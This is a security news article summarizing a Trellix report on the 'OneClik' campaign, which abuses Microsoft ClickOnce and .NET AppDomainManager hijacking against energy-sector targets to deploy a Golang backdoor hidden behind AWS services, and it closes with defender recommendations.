APT Groups Exploit Microsoft ClickOnce for Malware Execution via Trusted Hosts

A recent report by the Trellix Advanced Research Center has exposed a highly advanced malware campaign, dubbed “OneClik,” which leverages Microsoft ClickOnce technology to execute malicious payloads on targeted systems.

The attackers specifically focus on the energy, oil, and gas sector, using phishing emails to deliver seemingly legitimate applications that, once launched, unleash sophisticated backdoors and command-and-control (C2) capabilities.

The campaign’s tactics, techniques, and procedures (TTPs) bear hallmarks of Chinese-affiliated advanced persistent threat (APT) groups, though attribution remains cautious.

Technical Exploitation: From ClickOnce to Backdoor Execution

Microsoft ClickOnce is a trusted .NET deployment technology that enables self-updating applications from remote sources.

However, threat actors have weaponized this feature, launching malicious code under the trusted “dfsvc.exe” host process.

This allows attackers to bypass traditional security controls, executing their payloads at user privilege without triggering User Account Control (UAC) prompts, making detection significantly more challenging.

In the OneClik campaign, victims are lured via phishing emails to a fake “hardware analysis” website. Clicking the link downloads a ClickOnce manifest (.application file), masquerading as a legitimate tool.

Once executed, the manifest triggers the ClickOnce loader, which then injects malicious code via tampered .NET configuration files.

The loader employs AppDomainManager hijacking (T1574.014), modifying the .exe.config file to load a remote attacker-controlled DLL at Common Language Runtime (CLR) startup.

This technique ensures that the legitimate application (e.g., ZSATray.exe, umt.exe, or ied.exe) loads malicious code before its typical dependencies.

The malware’s modular loader, dubbed “OneClikNet,” is capable of fetching its payload through multiple channels: downloading from a C2 server, reading from a local file, or using an embedded payload.

The loader also generates machine-specific victim identifiers, suggesting targeted operations.

Payloads are encrypted with AES-128-CBC, using brute-forced initialization vectors to avoid static detection signatures.

Once decrypted, the loader executes shellcode in memory, leveraging internal .NET mechanisms to avoid traditional API calls and further evade detection.

Advanced Evasion and Cloud-Based C2 Infrastructure

The campaign’s sophistication is evident in its continuous evolution across three main variants (v1a, BPI-MDM, and v1d).

Each variant introduces new anti-analysis measures, such as anti-debugging loops, sandbox detection, and environment checks (e.g., domain/Azure AD join status, minimum RAM requirements).

The final payload, a Golang-based backdoor called “RunnerBeacon,” communicates with the attacker’s infrastructure, which is hidden behind legitimate AWS services—CloudFront, API Gateway, and Lambda—blending malicious traffic with normal cloud usage.

RunnerBeacon encrypts all C2 traffic with RC4 and serializes data using MessagePack, supporting multiple communication channels (HTTP, WebSockets, TCP, and SMB named pipes).

The backdoor’s modular protocol allows for a wide range of commands, including shell execution, file operations, network proxying, and process injection.

Defender Recommendations

Defenders are advised to monitor ClickOnce deployment activities closely, scrutinize .NET configuration files for suspicious modifications, and implement behavioral detection for unusual process activity under dfsvc.exe.

Network monitoring for anomalous traffic to AWS services—especially CloudFront, API Gateway, and Lambda can help identify potential C2 communication.

By understanding and mapping these TTPs, organizations can better protect themselves against this and similar advanced threats.